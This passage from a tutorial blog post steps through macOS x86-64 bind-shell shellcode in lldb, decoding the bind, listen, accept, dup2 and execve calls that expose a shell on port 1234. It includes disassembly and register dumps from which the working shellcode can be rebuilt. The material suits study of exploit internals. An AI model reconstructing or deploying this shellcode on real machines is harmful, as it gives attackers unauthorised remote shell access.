To fix ideas, the members of struct sockaddr_in have the following sizes:

struct sockaddr_in {
    __uint8_t       sin_len;            //1 byte
    sa_family_t     sin_family;         //1 byte
    in_port_t       sin_port;           //2 bytes
    struct  in_addr sin_addr;           //4 bytes
    char            sin_zero[8];        //8 bytes
};

In short, this structure is 16 bytes long. We can represent it graphically as follows:

[Image: memory layout of struct sockaddr_in (memory layout.png)]
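The sum of the sizes, and the offset of each member, can be double-checked with a minimal Python sketch. The format string "!BBH4s8s" is my own translation of the structure for the struct module (one byte, one byte, a 16-bit integer, 4 raw bytes, 8 raw bytes, with no padding); it is an illustration, not something taken from the headers:

```python
import struct

# B = sin_len, B = sin_family, H = sin_port, 4s = sin_addr, 8s = sin_zero
SOCKADDR_IN = struct.Struct("!BBH4s8s")

# Member sizes, as listed in the annotated structure above.
FIELDS = [
    ("sin_len", 1),
    ("sin_family", 1),
    ("sin_port", 2),
    ("sin_addr", 4),
    ("sin_zero", 8),
]

# Walk through the members and record where each one starts.
offsets = {}
position = 0
for name, size in FIELDS:
    offsets[name] = position
    position += size

print(SOCKADDR_IN.size, offsets)
```

Both computations give 16 bytes, the value that the shellcode later loads into dl.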

At this point, the situation is as follows:

Param. no.  Register  Value
1           RDI       0x0000000000000003
2           RSI       0x00007ff7bfeff870
3           RDX       0x0000000000000000

Let's go back to the code. The effect of the instruction <+33> is to load 0x10 = 16 into the lowest 8 bits of rdx, thus setting the third parameter (the size) of the bind() call.

In a similar way, the instruction <+35> prepares the syscall by finalising its number.

In short, we have:

     rdi = 0x0000000000000003
     rsi = 0x00007ff7bfeff870
     rdx = 0x0000000000000010
     rax = 0x0000000002000068

Now it's interesting to see the values of the structure. Let's read the stack around rsi; the 16 bytes of the structure are those starting at rsi, that is, the second row of the dump:

(lldb) register read rsi
     rsi = 0x00007ff7bfeff870
(lldb) memory read $rsi-0x10 $rsi+0x10
0x7ff7bfeff860: 14 00 00 00 00 00 00 00 70 f8 ef bf f7 7f 00 00  ........p.......
0x7ff7bfeff870: 00 02 04 d2 00 00 00 00 1e d5 00 00 01 00 00 00  ................

Now, using the graphical schema that we have shown before will help visualising memory allocation:

[Image: the bytes read from the stack, mapped onto the layout shown before (memory 2.png)]

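Reading the second row of the dump against the schema: 00 is sin_len, 02 is sin_family (AF_INET), and 04 d2 is sin_port, that is 0x04d2 = 1234 in network byte order. The following 00 00 00 00 is sin_addr: this value is a constant defined in in.h (the symbolic name is INADDR_ANY) and stands for any local address - in other words, the socket is bound to all the network interfaces of the machine, so the shell is reachable through any of them.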
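The same decoding can be done mechanically. This is a minimal Python sketch that unpacks the 16 bytes of the dump with the struct module; the format string is my own translation of struct sockaddr_in, and the variable names simply mirror the member names:

```python
import socket
import struct

# The 16 bytes starting at rsi, copied from the memory dump above.
dump = bytes.fromhex("00 02 04 d2 00 00 00 00 1e d5 00 00 01 00 00 00")

# "!" selects network byte order, which is how sin_port is stored.
sin_len, sin_family, sin_port, sin_addr, sin_zero = struct.unpack(
    "!BBH4s8s", dump
)
address = socket.inet_ntoa(sin_addr)

# The quadword pushed by the preamble, as it lies in memory.
pushed = (0xD2040200).to_bytes(8, "little")

print(sin_len, sin_family, sin_port, address, pushed == dump[:8])
```

The first 8 bytes are exactly the quadword pushed by the preamble, so the single constant 0xd2040200 encodes the family, the port and the address at once. The last 8 bytes (sin_zero) are simply whatever was already on the stack.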

This closes the analysis of bind. Phew!

Listen

The disassembled code for this chunk doesn't differ from the original:

    0x100003f84 <+39>: push   rax
    0x100003f85 <+40>: pop    rsi
    0x100003f86 <+41>: push   rbp
    0x100003f87 <+42>: pop    rax
    0x100003f88 <+43>: mov    al, 0x6a
    0x100003f8a <+45>: syscall

Here the syscall has number 106, which is defined in the syscalls.master file as follows:

106    AUE_LISTEN    ALL    { int listen(int s, int backlog) NO_SYSCALL_STUB; }

So, we follow the methodology that we adopted before: it should be clear by now that the first thing to do is launching man 2 listen and analysing the result. In this case, the API is defined as follows:

#include <sys/socket.h>

int listen(int socket, int backlog);

Creation of socket-based connections requires several operations. First, a socket is created with socket(2). Next, a willingness to accept incoming connections and a queue limit for incoming connections are specified with listen(). Finally, the connections are accepted with accept(2). The listen() call applies only to sockets of type SOCK_STREAM.

The backlog parameter defines the maximum length for the queue of pending connections. If a connection request arrives with the queue full, the client may receive an error with an indication of ECONNREFUSED. Alternatively, if the underlying protocol supports retransmission, the request may be ignored so that retries may succeed.

In this case, we are happy with no backlog management, so we pass 0.

The instructions <+39> to <+42> set the contents of RSI to those of RAX, and the contents of RAX to those of RBP:

Register  Before              After
RAX       0x0000000000000000  0x0000000002000000
RBP       0x0000000002000000  0x0000000002000000
RSI       0x00007ff7bfeff870  0x0000000000000000

The final effect is zeroing RSI (which is fine, because RSI is the register used to pass the second argument to a function) and preparing RAX for the syscall. Note that the zero comes from RAX, which holds the return value of bind(): it is 0 because the call succeeded. The first argument to the function is passed through the register RDI, which was set before and has not changed since.

(lldb) register read rdi
     rdi = 0x0000000000000003

So, the effect of the instruction <+43> is to set the lowest byte of rax to 106 and prepare for the syscall which is in <+45>.

Accepting incoming connections

I must admit I have been a little puzzled by the remaining part of the disassembled code. Before commenting, let's take a look at what we have:

bindshell[0x100003f8c] <+47>: push   rbp
bindshell[0x100003f8d] <+48>: pop    rax
bindshell[0x100003f8e] <+49>: mov    al, 0x1e
bindshell[0x100003f90] <+51>: cdq    
bindshell[0x100003f91] <+52>: syscall 
bindshell[0x100003f93] <+54>: xchg   eax, edi
bindshell[0x100003f94] <+55>: push   rbx
bindshell[0x100003f95] <+56>: pop    rsi

The effect of the instructions <+47>...<+49> is preparing the syscall. The syscall number is 0x1e, or 30 in decimal.

What puzzled me is that there is only ONE syscall invocation in this listing, and there are no jump instructions, hence no loop, whereas the source contains the dup2 loop and the final execve.

The reason for this is my shallowness when analysing. I disassembled the main subroutine, but as a matter of fact the loop starts at a label, dup_loop64, which lldb treats as another subroutine. In fact, if I execute:

(lldb) disassemble -n dup_loop64
bindshell`dup_loop64:
bindshell[0x100003f96] <+0>:  push   rbp
bindshell[0x100003f97] <+1>:  pop    rax
bindshell[0x100003f98] <+2>:  mov    al, 0x5a
bindshell[0x100003f9a] <+4>:  syscall 
bindshell[0x100003f9c] <+6>:  sub    esi, 0x1
bindshell[0x100003f9f] <+9>:  jns    0x100003f96               ; <+0>
bindshell[0x100003fa1] <+11>: xor    esi, esi
bindshell[0x100003fa3] <+13>: cdq    
bindshell[0x100003fa4] <+14>: movabs rbx, 0x68732f2f6e69622f
bindshell[0x100003fae] <+24>: push   rdx
bindshell[0x100003faf] <+25>: push   rbx
bindshell[0x100003fb0] <+26>: push   rsp
bindshell[0x100003fb1] <+27>: pop    rdi
bindshell[0x100003fb2] <+28>: push   rbp
bindshell[0x100003fb3] <+29>: pop    rax
bindshell[0x100003fb4] <+30>: mov    al, 0x3b
bindshell[0x100003fb6] <+32>: syscall

I obtain the missing part of the code.

Now, syscall 30 is documented in other xnu versions. In particular, the file at https://opensource.apple.com/source/xnu/xnu-7195.50.7.100.1/bsd/kern/syscalls.master.auto.html contains the following:

30    AUE_ACCEPT    ALL    { int accept(int s, caddr_t name, socklen_t    *anamelen) NO_SYSCALL_STUB; }

which is more actionable. The corresponding C prototype is

#include <sys/socket.h>

int accept(int socket, struct sockaddr *restrict address, socklen_t *restrict address_len);

and the man page for this API says:

The argument socket is a socket that has been created with socket(2), bound to an address with bind(2), and is listening for connections after a listen(2). accept() extracts the first connection request on the queue of pending connections, creates a new socket with the same properties of socket, and allocates a new file descriptor for the socket. If no pending connections are present on the queue, and the socket is not marked as non-blocking, accept() blocks the caller until a connection is present. If the socket is marked non-blocking and no pending connections are present on the queue, accept() returns an error as described below. The accepted socket may not be used to accept more connections. The original socket socket, remains open.

The argument address is a result parameter that is filled in with the address of the connecting entity, as known to the communications layer. The exact format of the address parameter is determined by the domain in which the communication is occurring. The address_len is a value-result parameter; it should initially contain the amount of space pointed to by address; on return it will contain the actual length (in bytes) of the address returned. This call is used with connection-based socket types, currently with SOCK_STREAM.

It is possible to select(2) a socket for the purposes of doing an accept() by selecting it for read.

Now let's reverse engineer this call. The status of the registers is:

Param. no. Register Value
1 RDI 0x0000000000000003
2 RSI 0x0000000000000030
3 RDX 0x0000000000000000

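The first parameter is the usual file descriptor of the listening socket. Nothing new. The two remaining parameters are not very relevant here: they tell accept where to store the address of the connecting peer and how much room is available for it, and the original comment accept(s, 0, 0) shows that the shellcode intends to pass null for both.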

Once the syscall is executed, the program accepts an incoming connection and creates a new file descriptor for it.

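Instruction <+54> exchanges EAX and EDI, so RAX now holds the descriptor of the listening socket and RDI the value returned by accept, which on success is the descriptor of the new connection. Note that in the register dump further down RDI holds 0xe and bit 0 of rflags (the carry flag) is set. macOS signals a failed syscall through the carry flag, so this particular run may well have returned an error code rather than a descriptor (14 is EFAULT), possibly because RSI was not zero as accept(s, 0, 0) assumes.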

The instructions <+55> and <+56> simply copy the value of RBX, which still holds 2 from the earlier xchg eax, ebx, into RSI.

Now the control flow reaches the dup_loop64 label, and we enter the Handle management section.

Before getting there, let's dump the status of the registers:

(lldb) register read 
General Purpose Registers:
       rax = 0x0000000000000003
       rbx = 0x0000000000000002
       rcx = 0x0000000100003f93  bindshell`main + 54
       rdx = 0x0000000000000000
       rdi = 0x000000000000000e
       rsi = 0x0000000000000002
       rbp = 0x0000000002000000
       rsp = 0x00007ff7bfeff8a0
        r8 = 0x00000000001085b1
        r9 = 0xffffffff00000000
       r10 = 0x0000000000000000
       r11 = 0x0000000000000347
       r12 = 0x00000001000883a0  dyld`_NSConcreteStackBlock
       r13 = 0x00007ff7bfeff958
       r14 = 0x0000000100003f5d  bindshell`main
       r15 = 0x0000000100074010  dyld`dyld4::sConfigBuffer
       rip = 0x0000000100003f96  bindshell`dup_loop64
    rflags = 0x0000000000000247
        cs = 0x000000000000002b
        fs = 0x0000000000000000
        gs = 0x0000000000000000
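
The rflags value in this dump is easier to read once it is split into individual flags. The Python sketch below does that. The helper name decode_rflags is invented for illustration. The bit positions are the standard x86 ones. The reading of the carry flag as "the last syscall failed" is an assumption about the macOS syscall convention, not something this session proves.

```python
import errno

# Standard x86 flag bit positions (bit 1 is reserved and always reads as 1).
FLAG_BITS = {
    "CF": 0, "PF": 2, "AF": 4, "ZF": 6, "SF": 7,
    "TF": 8, "IF": 9, "DF": 10, "OF": 11,
}


def decode_rflags(value):
    """Return the names of the flags that are set in an rflags value."""
    return [name for name, bit in FLAG_BITS.items() if (value >> bit) & 1]


flags = decode_rflags(0x247)
print(flags)  # ['CF', 'PF', 'ZF', 'IF']

# Assumption: with CF set, the value that accept left in rax (now in rdi
# after the xchg) would be an errno rather than a file descriptor.
if "CF" in flags:
    print(errno.errorcode.get(0x0E))
```

None of the instructions between the syscall at <+52> and the dup_loop64 label modify the flags, so the carry flag seen here is the one left by the accept call.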

Handle management

We need to redirect STDIN, STDOUT, and STDERR to the newly created connection. This is accomplished in this loop:

    0x100003f96 <+0>:  push   rbp
    0x100003f97 <+1>:  pop    rax
    0x100003f98 <+2>:  mov    al, 0x5a
    0x100003f9a <+4>:  syscall 
    0x100003f9c <+6>:  sub    esi, 0x1
    0x100003f9f <+9>:  jns    0x100003f96               ; <+0>

Before the loop starts, we have rsi = 0x0000000000000002. Instruction <+6> decrements the register, and instruction <+9> (jns) jumps back to the label as long as the result is not negative. In other words, esi takes the values 2, 1, 0 across the three iterations. These are the file descriptors of STDERR, STDOUT, and STDIN respectively. Since rsi carries the second parameter of a call, the syscall is invoked once for each of the three descriptors. The first three instructions (<+0>...<+2>) set RAX to the syscall number.
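
To double check which values of esi the syscall actually sees, the sub/jns pair can be emulated in Python. This is a minimal sketch with an invented function name (dup_loop_fds). It models only the 32-bit subtraction and the sign flag, nothing else of the CPU state.

```python
def dup_loop_fds(esi=2):
    """Emulate `sub esi, 1` / `jns` and list esi at each syscall."""
    seen = []
    while True:
        seen.append(esi)              # the syscall runs with the current esi
        esi = (esi - 1) & 0xFFFFFFFF  # sub esi, 1 with 32-bit wraparound
        sign_flag = esi >> 31         # SF mirrors bit 31 of the result
        if sign_flag:                 # jns is not taken once SF = 1
            break
    return seen


print(dup_loop_fds())  # [2, 1, 0]
```

The loop ends when esi wraps from 0 to 0xFFFFFFFF, because that is the first result with the sign bit set.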

Now, 0x5a in decimal is 90, corresponding to the syscall:

90      AUE_DUP2        ALL     { int sys_dup2(u_int from, u_int to); }

and we already know what we have to do: man 2 dup2.

In short, dup2 makes the descriptor given as the second argument refer to the same object as the first. Here it makes descriptors 2, 1, and 0 refer to the accepted connection, which implements the redirection.
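
The behaviour of dup2 is easy to try out from Python, whose os.dup2 wraps the same call. The sketch below uses a pipe instead of a network connection and a throwaway descriptor instead of 0, 1, or 2, so that it does not disturb the interpreter's own standard streams. The function name redirect_demo is made up for this example.

```python
import os


def redirect_demo(message=b"hello via dup2\n"):
    """Point a spare descriptor at a pipe with dup2 and write through it."""
    read_end, write_end = os.pipe()
    spare = os.dup(read_end)   # stand-in for fd 0/1/2 in the shellcode
    os.dup2(write_end, spare)  # spare now refers to the pipe's write end
    os.write(spare, message)   # goes into the pipe, like output into the socket
    data = os.read(read_end, len(message))
    for fd in (read_end, write_end, spare):
        os.close(fd)
    return data


print(redirect_demo())
```

In the shellcode the first argument is the accepted connection and the second argument runs over 2, 1, 0, so everything the shell later reads or writes travels over the socket.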

Shell execution

We already discussed this code in Come taste some shellcode....
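
As a quick reminder of what the immediate in the movabs instruction at <+14> of the dup_loop64 listing holds, it can be decoded in Python. This is a small sketch with an invented helper name (decode_movabs). It relies only on x86 storing integers in little-endian order.

```python
def decode_movabs(imm64):
    """Return the 8 bytes a 64-bit immediate occupies in memory once pushed."""
    return imm64.to_bytes(8, "little")


path = decode_movabs(0x68732F2F6E69622F)
print(path)  # b'/bin//sh'

# 0x3b, moved into al at <+30>, is 59 in decimal.
print(0x3B)  # 59
```

The doubled slash pads the path to exactly eight bytes so that it fits in one register, and the push rdx just before push rbx puts RDX on the stack right after the string, where it is meant to act as the terminator.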

Conclusions

This lesson has been very productive. We have:

  1. learned how to produce null-byte-free code
  2. reviewed some techniques to set the syscall numbers
  3. learned about the sizes of some types
  4. got acquainted (hopefully!) with the AMD64 calling convention
  5. learned a methodology to investigate syscalls
  6. learned how to pass pointers to routines, and how the stack is used for that.

I must admit that lldb alone may not be sufficient for complex projects. I am making a point of approaching larger projects with two disassemblers side by side.
